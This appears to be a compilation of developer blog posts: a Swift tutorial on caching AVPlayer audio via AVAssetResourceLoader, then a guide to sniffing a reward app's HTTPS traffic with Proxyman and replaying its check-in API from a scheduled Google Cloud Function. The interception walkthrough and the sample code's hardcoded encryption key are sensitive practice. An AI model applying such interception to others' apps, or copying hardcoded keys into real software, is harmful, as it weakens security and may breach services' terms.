+ self.loaderQueue = loaderQueue
+ self.assetDataManager = assetDataManager
+ super.init()
+ }
+
+ func start(requestRange: RequestRange) {
+ guard isCancelled == false, isFinished == false else {
+ return
+ }
+
+ self.loaderQueue.async { [weak self] in
+ guard let self = self else {
+ return
+ }
+
+ var request = URLRequest(url: self.originalURL)
+ self.requestRange = requestRange
+ let start = String(requestRange.start)
+ let end: String
+ switch requestRange.end {
+ case .requestTo(let rangeEnd):
+ end = String(rangeEnd)
+ case .requestToEnd:
+ end = ""
+ }
+
+ let rangeHeader = "bytes=\(start)-\(end)"
+ request.setValue(rangeHeader, forHTTPHeaderField: "Range")
+
+ let session = URLSession(configuration: .default, delegate: self, delegateQueue: nil)
+ self.session = session
+ let dataTask = session.dataTask(with: request)
+ self.dataTask = dataTask
+ dataTask.resume()
+ }
+ }
+
+ func cancel() {
+ self.isCancelled = true
+ }
+
+ func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data) {
+ guard self.type == .dataRequest else {
+ return
+ }
+
+ self.loaderQueue.async {
+ self.delegate?.dataRequestDidReceive(self, data)
+ self.downloadedData.append(data)
+ }
+ }
+
+ func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive response: URLResponse, completionHandler: @escaping (URLSession.ResponseDisposition) -> Void) {
+ self.response = response
+ completionHandler(.allow)
+ }
+
+ func urlSession(_ session: URLSession, task: URLSessionTask, didCompleteWithError error: Error?) {
+ self.isFinished = true
+ self.loaderQueue.async {
+ if self.type == .contentInformation {
+ guard error == nil,
+ let response = self.response as? HTTPURLResponse else {
+ let responseError = error ?? ResponseUnExpectedError()
+ self.delegate?.contentInformationDidComplete(self, .failure(responseError))
+ return
+ }
+
+ let contentInformation = AssetDataContentInformation()
+
+ if let rangeString = response.allHeaderFields["Content-Range"] as? String,
+ let bytesString = rangeString.split(separator: "/").map({String($0)}).last,
+ let bytes = Int64(bytesString) {
+ contentInformation.contentLength = bytes
+ }
+
+ if let mimeType = response.mimeType,
+ let contentType = UTTypeCreatePreferredIdentifierForTag(kUTTagClassMIMEType, mimeType as CFString, nil)?.takeRetainedValue() {
+ contentInformation.contentType = contentType as String
+ }
+
+ if let value = response.allHeaderFields["Accept-Ranges"] as? String,
+ value == "bytes" {
+ contentInformation.isByteRangeAccessSupported = true
+ } else {
+ contentInformation.isByteRangeAccessSupported = false
+ }
+
+ self.assetDataManager?.saveContentInformation(contentInformation)
+ self.delegate?.contentInformationDidComplete(self, .success(contentInformation))
+ } else {
+ if let offset = self.requestRange?.start, self.downloadedData.count > 0 {
+ self.assetDataManager?.saveDownloadedData(self.downloadedData, offset: Int(offset))
+ }
+ self.delegate?.dataRequestDidComplete(self, error, self.downloadedData)
+ }
+ }
+ }
+}
+
Encapsulation for Remote Request, mainly for data requests initiated by ResourceLoader.
RequestType
: Used to distinguish whether this Request is the first request for file information (contentInformation) or a data request (dataRequest).
RequestRange
: Request Range scope, end can specify to where (requestTo(Int64)) or all (requestToEnd).
File information can be obtained from:
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive response: URLResponse, completionHandler: @escaping (URLSession.ResponseDisposition) -> Void)
+
Get the Response Header from it. Additionally, note that if you want to change to HEAD, it won’t enter here; you need to use other methods to receive it.
isByteRangeAccessSupported
: Check Accept-Ranges == bytes in the Response Header.contentType
: The file type information required by the player, formatted as a Uniform Type Identifier, not audio/mpeg, but written as public.mp3.contentLength
: Check Content-Range in the Response Header: bytes 0–1/ total length of the resource.⚠️ Note that the format given by the server may vary in case sensitivity. It may not be written as Accept-Ranges/Content-Range; some servers use lowercase accept-ranges, Accept-ranges…
Supplement: If you need to consider case sensitivity, you can write an HTTPURLResponse Extension
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+
import CoreServices
+
+extension HTTPURLResponse {
+ func parseContentLengthFromContentRange() -> Int64? {
+ let contentRangeKeys: [String] = [
+ "Content-Range",
+ "content-range",
+ "Content-range",
+ "content-Range"
+ ]
+
+ var rangeString: String?
+ for key in contentRangeKeys {
+ if let value = self.allHeaderFields[key] as? String {
+ rangeString = value
+ break
+ }
+ }
+
+ guard let rangeString = rangeString,
+ let contentLengthString = rangeString.split(separator: "/").map({String($0)}).last,
+ let contentLength = Int64(contentLengthString) else {
+ return nil
+ }
+
+ return contentLength
+ }
+
+ func parseAcceptRanges() -> Bool? {
+ let contentRangeKeys: [String] = [
+ "Accept-Ranges",
+ "accept-ranges",
+ "Accept-ranges",
+ "accept-Ranges"
+ ]
+
+ var rangeString: String?
+ for key in contentRangeKeys {
+ if let value = self.allHeaderFields[key] as? String {
+ rangeString = value
+ break
+ }
+ }
+
+ guard let rangeString = rangeString else {
+ return nil
+ }
+
+ return rangeString == "bytes" || rangeString == "Bytes"
+ }
+
+ func mimeTypeUTI() -> String? {
+ guard let mimeType = self.mimeType,
+ let contentType = UTTypeCreatePreferredIdentifierForTag(kUTTagClassMIMEType, mimeType as CFString, nil)?.takeRetainedValue() else {
+ return nil
+ }
+
+ return contentType as String
+ }
+}
+
Usage:
1
+
func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data)
+
As mentioned in the preliminary knowledge, the downloaded data will be obtained in real-time, so this method will keep getting called, receiving Data in fragments; we will append it to downloadedData
for storage.
1
+
func urlSession(_ session: URLSession, task: URLSessionTask, didCompleteWithError error: Error?)
+
This method is called when the task is canceled or completed, where the downloaded data will be saved.
As mentioned in the preliminary knowledge about the Cancel mechanism, since the player will initiate a Cancel Request after obtaining enough data, when this method is called, the actual error = NSURLErrorCancelled
will be received. Therefore, regardless of the error, we will try to save the data if we have received it.
⚠️ Since URLSession requests data concurrently, please ensure all operations are performed within DispatchQueue to avoid data corruption (data corruption can also result in playback issues).
⚠️ If URLSession does not call
finishTasksAndInvalidate
orinvalidateAndCancel
, it will strongly retain objects, causing a Memory Leak. Therefore, whether canceling or completing, we must call these methods to release the Request when the task ends.
⚠️ If you are concerned about
downloadedData
causing OOM, you can save it locally in didReceive Data.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+
import AVFoundation
+import Foundation
+
+class ResourceLoader: NSObject {
+
+ let loaderQueue = DispatchQueue(label: "li.zhgchg.resourceLoader.queue")
+
+ private var requests: [AVAssetResourceLoadingRequest: ResourceLoaderRequest] = [:]
+ private let cacheKey: String
+ private let originalURL: URL
+
+ init(asset: CachingAVURLAsset) {
+ self.cacheKey = asset.cacheKey
+ self.originalURL = asset.originalURL
+ super.init()
+ }
+
+ deinit {
+ self.requests.forEach { (request) in
+ request.value.cancel()
+ }
+ }
+}
+
+extension ResourceLoader: AVAssetResourceLoaderDelegate {
+ func resourceLoader(_ resourceLoader: AVAssetResourceLoader, shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool {
+
+ let type = ResourceLoader.resourceLoaderRequestType(loadingRequest)
+ let assetDataManager = PINCacheAssetDataManager(cacheKey: self.cacheKey)
+
+ if let assetData = assetDataManager.retrieveAssetData() {
+ if type == .contentInformation {
+ loadingRequest.contentInformationRequest?.contentLength = assetData.contentInformation.contentLength
+ loadingRequest.contentInformationRequest?.contentType = assetData.contentInformation.contentType
+ loadingRequest.contentInformationRequest?.isByteRangeAccessSupported = assetData.contentInformation.isByteRangeAccessSupported
+ loadingRequest.finishLoading()
+ return true
+ } else {
+ let range = ResourceLoader.resourceLoaderRequestRange(type, loadingRequest)
+ if assetData.mediaData.count > 0 {
+ let end: Int64
+ switch range.end {
+ case .requestTo(let rangeEnd):
+ end = rangeEnd
+ case .requestToEnd:
+ end = assetData.contentInformation.contentLength
+ }
+
+ if assetData.mediaData.count >= end {
+ let subData = assetData.mediaData.subdata(in: Int(range.start)..<Int(end))
+ loadingRequest.dataRequest?.respond(with: subData)
+ loadingRequest.finishLoading()
+ return true
+ } else if range.start <= assetData.mediaData.count {
+ // has cache data...but not enough
+ let subEnd = (assetData.mediaData.count > end) ? Int((end)) : (assetData.mediaData.count)
+ let subData = assetData.mediaData.subdata(in: Int(range.start)..<subEnd)
+ loadingRequest.dataRequest?.respond(with: subData)
+ }
+ }
+ }
+ }
+
+ let range = ResourceLoader.resourceLoaderRequestRange(type, loadingRequest)
+ let resourceLoaderRequest = ResourceLoaderRequest(originalURL: self.originalURL, type: type, loaderQueue: self.loaderQueue, assetDataManager: assetDataManager)
+ resourceLoaderRequest.delegate = self
+ self.requests[loadingRequest]?.cancel()
+ self.requests[loadingRequest] = resourceLoaderRequest
+ resourceLoaderRequest.start(requestRange: range)
+
+ return true
+ }
+
+ func resourceLoader(_ resourceLoader: AVAssetResourceLoader, didCancel loadingRequest: AVAssetResourceLoadingRequest) {
+ guard let resourceLoaderRequest = self.requests[loadingRequest] else {
+ return
+ }
+
+ resourceLoaderRequest.cancel()
+ requests.removeValue(forKey: loadingRequest)
+ }
+}
+
+extension ResourceLoader: ResourceLoaderRequestDelegate {
+ func contentInformationDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ result: Result<AssetDataContentInformation, Error>) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ switch result {
+ case .success(let contentInformation):
+ loadingRequest.contentInformationRequest?.contentType = contentInformation.contentType
+ loadingRequest.contentInformationRequest?.contentLength = contentInformation.contentLength
+ loadingRequest.contentInformationRequest?.isByteRangeAccessSupported = contentInformation.isByteRangeAccessSupported
+ loadingRequest.finishLoading()
+ case .failure(let error):
+ loadingRequest.finishLoading(with: error)
+ }
+ }
+
+ func dataRequestDidReceive(_ resourceLoaderRequest: ResourceLoaderRequest, _ data: Data) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ loadingRequest.dataRequest?.respond(with: data)
+ }
+
+ func dataRequestDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ error: Error?, _ downloadedData: Data) {
+ guard let loadingRequest = self.requests.first(where: { $0.value == resourceLoaderRequest })?.key else {
+ return
+ }
+
+ loadingRequest.finishLoading(with: error)
+ requests.removeValue(forKey: loadingRequest)
+ }
+}
+
+extension ResourceLoader {
+ static func resourceLoaderRequestType(_ loadingRequest: AVAssetResourceLoadingRequest) -> ResourceLoaderRequest.RequestType {
+ if let _ = loadingRequest.contentInformationRequest {
+ return .contentInformation
+ } else {
+ return .dataRequest
+ }
+ }
+
+ static func resourceLoaderRequestRange(_ type: ResourceLoaderRequest.RequestType, _ loadingRequest: AVAssetResourceLoadingRequest) -> ResourceLoaderRequest.RequestRange {
+ if type == .contentInformation {
+ return ResourceLoaderRequest.RequestRange(start: 0, end: .requestTo(1))
+ } else {
+ if loadingRequest.dataRequest?.requestsAllDataToEndOfResource == true {
+ let lowerBound = loadingRequest.dataRequest?.currentOffset ?? 0
+ return ResourceLoaderRequest.RequestRange(start: lowerBound, end: .requestToEnd)
+ } else {
+ let lowerBound = loadingRequest.dataRequest?.currentOffset ?? 0
+ let length = Int64(loadingRequest.dataRequest?.requestedLength ?? 1)
+ let upperBound = lowerBound + length
+ return ResourceLoaderRequest.RequestRange(start: lowerBound, end: .requestTo(upperBound))
+ }
+ }
+ }
+}
+
loadingRequest.contentInformationRequest
!= nil indicates the first request, where the player asks for file information.
When requesting file information, we need to provide these three pieces of information:
loadingRequest.contentInformationRequest?.isByteRangeAccessSupported
: Whether Range access to Data is supportedloadingRequest.contentInformationRequest?.contentType
: Uniform type identifierloadingRequest.contentInformationRequest?.contentLength
: Total file length Int64loadingRequest.dataRequest?.requestedOffset
can get the starting offset of the requested Range.
loadingRequest.dataRequest?.requestedLength
can get the length of the requested Range.
loadingRequest.dataRequest?.requestsAllDataToEndOfResource
== true means that regardless of the requested Range length, it will fetch until the end.
loadingRequest.dataRequest?.respond(with: Data)
returns the loaded Data to the player.
loadingRequest.dataRequest?.currentOffset
can get the current data offset, and dataRequest?.respond(with: Data)
will shift the currentOffset
.
loadingRequest.finishLoading()
indicates that all data has been loaded and informs the player.
1
+
func resourceLoader(_ resourceLoader: AVAssetResourceLoader, shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool
+
When the player requests data, we first check if there is data in the local Cache. If there is, we return it; if only part of the data is available, we return that part. For example, if we have 0–100 locally and the player requests 0–200, we return 0–100 first.
If there is no local Cache or the returned data is insufficient, a ResourceLoaderRequest will be initiated to fetch data from the network.
1
+
func resourceLoader(_ resourceLoader: AVAssetResourceLoader, didCancel loadingRequest: AVAssetResourceLoadingRequest)
+
The player cancels the request, canceling the ResourceLoaderRequest.
You might have noticed
resourceLoaderRequestRange
offset is based oncurrentOffset
because we first load the downloaded Data from the localdataRequest?.respond(with: Data)
; so we can directly look at the shifted offset.
1
+
func private var requests: [AVAssetResourceLoadingRequest: ResourceLoaderRequest] = [:]
+
⚠️ Some examples use
currentRequest: ResourceLoaderRequest
to store requests, which can be problematic. If the current request is fetching data and the user seeks, the old request will be canceled and a new one initiated. Since these actions may not occur in order, using a Dictionary for storage and operations is safer!
⚠️ Ensure all operations are on the same DispatchQueue to prevent data inconsistencies.
Cancel all ongoing requests during deinit Resource Loader Deinit indicates AVURLAsset Deinit, meaning the player no longer needs this resource. Therefore, we can cancel ongoing Requests, and the already loaded data will still be written to Cache.
Thanks to Lex 汤 for the guidance.
Thanks to 外孫女 for providing development advice and support.
Large video files may encounter Out Of Memory issues in downloadedData, AssetData/PINCacheAssetDataManager.
As mentioned earlier, to solve this problem, use fileHandler seek read/write to operate local Cache read/write (replacing AssetData/PINCacheAssetDataManager); or look for projects on Github that handle large data write/read to file.
As stated in the preliminary knowledge, changing the playback target will not trigger a Cancel; if it is AVPlayer, it will go through AVURLAsset Deinit, so the download will also be interrupted; but AVQueuePlayer will not, because it is still in the Queue, only the playback target has switched to the next one.
The only way here is to receive the notification of changing the playback target, and then cancel the loading of the previous AVURLAsset after receiving the notification.
1
+
asset.cancelLoading()
+
Audio encryption and decryption can be performed in ResourceLoaderRequest when obtaining Data, and when storing, encryption and decryption can be performed on the Data stored locally in the encode/decode of AssetData.
CryptoKit SHA usage example:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+
class AssetData: NSObject, NSCoding {
+ static let encryptionKeyString = "encryptionKeyExzhgchgli"
+ ...
+ func encode(with coder: NSCoder) {
+ coder.encode(self.contentInformation, forKey: #keyPath(AssetData.contentInformation))
+
+ if #available(iOS 13.0, *),
+ let encryptionData = try? ChaChaPoly.seal(self.mediaData, using: AssetData.encryptionKey).combined {
+ coder.encode(encryptionData, forKey: #keyPath(AssetData.mediaData))
+ } else {
+ //
+ }
+ }
+
+ required init?(coder: NSCoder) {
+ super.init()
+ ...
+ if let mediaData = coder.decodeObject(forKey: #keyPath(AssetData.mediaData)) as? Data {
+ if #available(iOS 13.0, *),
+ let sealedBox = try? ChaChaPoly.SealedBox(combined: mediaData),
+ let decryptedData = try? ChaChaPoly.open(sealedBox, using: AssetData.encryptionKey) {
+ self.mediaData = decryptedData
+ } else {
+ //
+ }
+ } else {
+ //
+ }
+ }
+}
+
PINCache includes PINMemoryCache and PINDiskCache. PINCache will handle reading from file to Memory or writing from Memory to file for us. We only need to operate on PINCache.
To find the Cache file location in the simulator:
Use NSHomeDirectory()
to get the simulator file path
Finder -> Go -> Paste the path
In Library -> Caches -> com.pinterest.PINDiskCache.ResourceLoader is the Resource Loader Cache directory we created.
PINCache(name: “ResourceLoader”)
where the name is the directory name.
You can also specify the rootPath, and the directory can be moved under Documents (not afraid of being cleared by the system).
Set the maximum limit for PINCache:
1
+2
+
PINCacheAssetDataManager.Cache.diskCache.byteCount = 300 * 1024 * 1024 // max: 300mb
+ PINCacheAssetDataManager.Cache.diskCache.byteLimit = 90 * 60 * 60 * 24 // 90 days
+
System default limit
Setting it to 0 will not proactively delete files.
Initially underestimated the difficulty of this feature, thinking it could be handled quickly; ended up struggling and spent about two more weeks dealing with data storage issues. However, I thoroughly understood the entire Resource Loader operation mechanism, GCD, and Data.
Finally, here are the references for how to implement it:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Creating a daily automatic check-in script using a check-in reward app as an example
Photo by Paweł Czerwiński
I have always had the habit of using Python to create small tools; some are serious, like automatically crawling data and generating reports for work, and some are less serious, like scheduling automatic checks for desired information or delegating tasks that would otherwise be done manually to scripts.
When it comes to automation, I have always been quite straightforward, setting up a computer to run Python scripts continuously; the advantage is simplicity and convenience, but the downside is the need for a device connected to the internet and power. Even a Raspberry Pi consumes a small amount of electricity and internet costs, and it cannot be remotely controlled to start or stop (it actually can, but it’s cumbersome). This time, I took advantage of a work break to explore a free & cloud-based method.
Move the Python script to the cloud for execution, schedule it to run automatically, and enable it to be started/stopped via the internet.
This article uses a script I wrote for a check-in reward app as an example. The script automatically checks in daily, so I don’t have to open the app manually; it also sends me a notification upon completion.
Completion Notification!
I previously wrote an article titled “The app uses HTTPS for transmission, but the data was still stolen.” The principle is similar, but this time I used Proxyman instead of mitmproxy; it’s also free but more user-friendly.
“Certificate” -> “Install Certificate On this Mac” -> “Installed & Trusted”
After installing the Root certificate on the computer, switch to the mobile:
“Certificate” -> “Install Certificate On iOS” -> “Physical Devices…”
Follow the instructions to set up the Proxy on your mobile and complete the certificate installation and activation.
At this point, Proxyman on the Mac will show the sniffed traffic. Click on the app API domain under the device IP that you want to view; the first time you view it, you need to click “Enable only this domain” for the subsequent traffic to be unpacked.
After “Enable only this domain,” you will see the newly intercepted traffic showing the original Request and Response information:
We use this method to sniff which API EndPoint is called and what data is sent when performing a check-in operation on the app. Record this information and use Python to simulate the request later.
⚠️ Note that some app token information may change, causing the Python simulated request to fail in the future. You need to understand more about the app token exchange method.
⚠️ If Proxyman is confirmed to be working properly, but the app cannot make requests when Proxyman is enabled, it means the app may have SSL Pinning; currently, there is no solution, and you have to give up.
⚠️ App developers who want to know how to prevent sniffing can refer to the previous article.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
POST /usercenter HTTP/1.1
+Host: zhgchg.li
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=dafd27784f94904dd586d4ca19d8ae62
+Connection: keep-alive
+Accept: */*
+User-Agent: (iPhone12,3;iOS 14.5)
+Content-Length: 1076
+Accept-Language: zh-tw
+Accept-Encoding: gzip, deflate, br
+AuthToken: 12345
+
Before writing the Python script, we can first use Postman to debug the parameters and see which parameters are necessary or change over time; but you can also directly copy them.
checkIn.py:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
import requests
+import json
+
+def main(args):
+ results = {}
+ try:
+ data = { "action" : "checkIn" }
+ headers = { "Cookie" : "PHPSESSID=dafd27784f94904dd586d4ca19d8ae62",
+ "AuthToken" : "12345",
+ "User-Agent" : "(iPhone12,3;iOS 14.5)"
+ }
+
+ request = requests.post('https://zhgchg.li/usercenter', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result['status_code'] == 200:
+ return "CheckIn Success!"
+ else:
+ return result['message']
+ except Exception as e:
+ return str(e)
+
⚠️
main(args)
The purpose of args will be explained later. If you want to test locally, just usemain(True)
.
Using the Requests library to execute HTTP Requests, if you encounter:
1
+
ImportError: No module named requests
+
Please install the library using pip install requests
.
I made this part very simple, just for reference, and only to notify myself.
Fill in the basic information in the next step and click “Create” to submit.
With the User ID and Token, we can send messages to ourselves.
Since we don’t need other functionalities, we don’t even need to install the python line sdk, just send HTTP requests directly.
After integrating with the previous Python script…
checkIn.py:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+
import requests
+import json
+
+def main(args):
+ results = {}
+ try:
+ data = { "action" : "checkIn" }
+ headers = { "Cookie" : "PHPSESSID=dafd27784f94904dd586d4ca19d8ae62",
+ "AuthToken" : "12345",
+ "User-Agent" : "(iPhone12,3;iOS 14.5)"
+ }
+
+ request = requests.post('https://zhgchg.li/usercenter', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result['status_code'] == 200:
+ sendLineNotification("CheckIn Success!")
+ return "CheckIn Success!"
+ else:
+ sendLineNotification(result['message'])
+ return result['message']
+ except Exception as e:
+ sendLineNotification(str(e))
+ return str(e)
+
+def sendLineNotification(message):
+ data = {
+ "to" : "Your User ID here",
+ "messages" : [
+ {
+ "type" : "text",
+ "text" : message
+ }
+ ]
+ }
+ headers = {
+ "Content-Type" : "application/json",
+ "Authorization" : "Your channel access token here"
+ }
+ request = requests.post('https://api.line.me/v2/bot/message/push',json = data, headers = headers)
+
Test if the notification was sent successfully:
Success!
A small note, I originally wanted to use Gmail SMTP to send emails for notifications, but after uploading to Google Cloud, I found it couldn’t be used…
After covering the basics, let’s get to the main event of this article: moving the Python script to the cloud.
Initially, I aimed for Google Cloud Run but found it too complicated and didn’t want to spend time researching it because my needs are minimal and don’t require so many features. So, I used Google Cloud Function, a serverless solution; it’s more commonly used to build serverless web services.
⚠️ Note down the “ Trigger URL“
Region options:
US-WEST1
, US-CENTRAL1
, US-EAST1
can enjoy free Cloud Storage service quotas.asia-east2
(Hong Kong) is closer to us but requires a small Cloud Storage fee.⚠️ Creating Cloud Functions requires Cloud Storage to store the code.
⚠️ For detailed pricing, please refer to the end of the article.
Trigger type: HTTP
Authentication: Depending on your needs, I want to be able to execute the script from an external link, so I choose “Allow unauthenticated invocations”; if you choose to require authentication, the Scheduler service will also need corresponding settings.
Variables, network, and advanced settings can be set in the variables section for Python to use (this way, if parameters change, you don’t need to modify the Python code):
How to call in Python:
1
+2
+3
+4
+
import os
+
+def main(request):
+ return os.environ.get('test', 'DEFAULT VALUE')
+
No need to change other settings, just “Save” -> “Next”.
Supplement main(args), as mentioned earlier, this service is more used for serverless web; so args are actually Request objects, from which you can get http get query and http post body data, as follows:
1
+2
+
Get GET Query information:
+request_args = args.args
+
example: ?name=zhgchgli => request_args = [“name”:”zhgchgli”]
1
+2
+
Get POST Body data:
+request_json = request.get_json(silent=True)
+
example: name=zhgchgli => request_json = [“name”:”zhgchgli”]
If testing POST with Postman, remember to use “Raw+JSON” POST data, otherwise, nothing will be received:
We use the “requests” package to help us make API calls, which is not in the native Python library; so we need to add it here:
1
+
requests>=2.25.1
+
Here is the translated Markdown content:
Specify version ≥ 2.25.1 here, or just enter requests
to install the latest version.
It takes about 1-3 minutes to complete the deployment.
If 500 Internal Server Error
appears, it means there is an error in the program. You can click the name to view the “Logs” and find the reason:
1
+
UnboundLocalError: local variable 'db' referenced before assignment
+
If the test is fine, it’s done! We have successfully moved the Python script to the cloud.
According to our needs, we need a place to store and read the token of the check-in APP; because the token may expire, it needs to be re-requested and written for use in the next execution.
To dynamically pass variables from the outside to the script, the following methods are available:
In the program, using the relative path ./
can read it, only read, cannot dynamically modify; to modify, you can only do it in the console and redeploy.
To read and dynamically modify, you need to connect to other GCP services, such as: Cloud SQL, Google Storage, Firebase Cloud Firestore…
According to the Getting Started Guide, after creating the Firebase project, enter the Firebase console:
Find “ Cloud Firestore “ in the left menu -> “ Add Collection “
Enter the collection ID.
Enter the data content.
A collection can have multiple documents, and each document can have its own field content; it is very flexible to use.
In Python:
First, go to GCP Console -> IAM & Admin -> Service Accounts, and follow the steps below to download the authentication private key file:
First, select the account:
Below, “Add Key” -> “Create New Key”
Select “JSON” to download the file.
Place this JSON file in the same directory as the Python project.
In the local development environment:
1
+
pip install --upgrade firebase-admin
+
Install the firebase-admin package.
In Cloud Functions, add firebase-admin
to requirements.txt
.
Once the environment is set up, we can read the data we just added:
firebase_admin.py:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
import firebase_admin
+from firebase_admin import credentials
+from firebase_admin import firestore
+
+if not firebase_admin._apps:
+ cred = credentials.Certificate('./authentication.json')
+ firebase_admin.initialize_app(cred)
+# Because initializing the app multiple times will cause the following error
+# providing an app name as the second argument. In most cases you only need to call initialize_app() once. But if you do want to initialize multiple apps, pass a second argument to initialize_app() to give each app a unique name.
+# So to be safe, check if it is already initialized before calling initialize_app
+
+db = firestore.client()
+ref = db.collection(u'example') // Collection name
+stream = ref.stream()
+for data in stream:
+ print("id:"+data.id+","+data.to_dict())
+
If you are on Cloud Functions, you can either upload the authentication JSON file together or change the connection syntax as follows:
1
+2
+3
+4
+5
+6
+
cred = credentials.ApplicationDefault()
+firebase_admin.initialize_app(cred, {
+ 'projectId': project_id,
+})
+
+db = firestore.client()
+
If you encounter
Failed to initialize a certificate credential.
, please check if the authentication JSON is correct.
For more operations like adding or deleting, please refer to the official documentation.
After having the script, the next step is to make it run automatically to achieve our final goal.
Execution frequency: Same as crontab input method. If you are not familiar with crontab syntax, you can directly use crontab.guru this amazing website:
It can clearly translate the actual meaning of the syntax you set. (Click next to see the next execution time)
Here I set
15 1 * * *
, because the check-in only needs to be executed once a day, set to execute at 1:15 AM every day.
URL part: Enter the “ trigger URL “ noted earlier
Time zone: Enter “Taiwan”, select Taipei Standard Time
HTTP method: According to the previous Python code, we use Get
If you set “authentication” earlier remember to expand “SHOW MORE” to set up authentication.
After filling everything out, press “ Create “.
⚠️ Please note that the execution result “failure” only refers to web status codes 400~500 or errors in the Python program.
We have achieved the goal of uploading the routine task Python script to the cloud and setting it to run automatically.
Another very important part is the pricing; Google Cloud and Linebot are not completely free services, so understanding the pricing is crucial. Otherwise, for a small script, paying too much money might not be worth it compared to just running it on a computer.
Refer to the official pricing information, which is free for up to 500 messages per month.
Refer to the official pricing information, which includes 2 million invocations, 400,000 GB-seconds, 200,000 GHz-seconds of compute time, and 5 GB of internet egress per month.
Refer to the official pricing information, which includes 1 GB of storage, 10 GB of data transfer per month, 50,000 reads per day, and 20,000 writes/deletes per day; sufficient for light usage!
Refer to the official pricing information, which allows 3 free jobs per account.
The above free quotas are more than enough for the script!
Despite all efforts, some services might still incur charges.
After creating Cloud Functions, two Cloud Storage instances will be automatically created:
If you chose US-WEST1, US-CENTRAL1, or US-EAST1 for Cloud Functions, you can enjoy free usage quotas:
I chose US-CENTRAL1, and you can see that the first Cloud Storage instance is indeed in US-CENTRAL1, but the second one is labeled Multiple regions in the US; I estimate this one will incur charges.
Refer to the official pricing information, which varies by region.
The code isn’t large, so I estimate the minimum charge will be around 0.0X0 per month (?)
⚠️ The above information was recorded on 2021/02/21, and the actual prices may vary. This is for reference only.
Just in case… if the usage exceeds the free quota and starts incurring charges, I want to receive notifications to avoid unexpectedly high bills due to program errors.
Click “View Detailed Deduction Records” to enter.
Next step.
Next step.
Here you can set the action to trigger a notification when the budget reaches a certain percentage.
Check “Send alerts to billing administrators and users via email”, so that when the condition is triggered, you will receive a notification immediately.
Click “Finish” to submit and save.
When the budget is exceeded, we can know immediately to avoid incurring more costs.
Human energy is limited. In today’s flood of technological information, every platform and service wants to extract our limited energy. If we can use some automated scripts to share our daily lives, we can save more energy to focus on important things!
If you have any questions or comments, feel free to contact me.
If you have any automation-related optimization needs, feel free to commission me. Thank you.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
New Google Site Personal Website Building Experience and Setup Tutorial
Currently, I have used my self-written ZMediumToMarkdown tool to package and download Medium articles and convert them to Markdown format, migrating to Jekyll.
Last year, when I changed jobs, I “extravagantly” registered a domain name to serve as a personal resume link; after half a year, I thought of making the domain more useful by adding more information. On the other hand, I was also looking for a second website to back up the articles published on Medium, just in case.
Around 2010, I used the old version of Google Site to create a personal website -> file download center page; the impression is a bit vague, but I remember the layout was cumbersome, and the interface was not smooth. After 10 years, I thought this service had been discontinued. I accidentally saw a domain investor using it to create a domain parking page with contact information for sale:
At first glance, I thought, “Wow! The visuals are nice, they even made a page to sell the domain.” Upon closer inspection of the bottom left corner, I realized, “Wow! It’s built with Google Site,” which is vastly different from the interface I used 10 years ago. After checking, I found out that Google Site had not been discontinued; instead, a new version was launched in 2016. Although it’s been almost five years since then, at least the interface is up-to-date!
Before saying anything else, let’s take a look at the finished product I made. If you also “feel the same,” you might consider giving it a try!
City Corner (Waterfall Photo Display)
Article Directory (Link to Medium)
Contact Me (Embedded Google Form)
To save reading time, I’ll get straight to the point; I’m still looking for a more suitable service option. Although it is continuously maintained and updated, Google Site has several critical shortcomings that are important to me. Here are the fatal flaws I encountered while using it.
Code Block with gray background
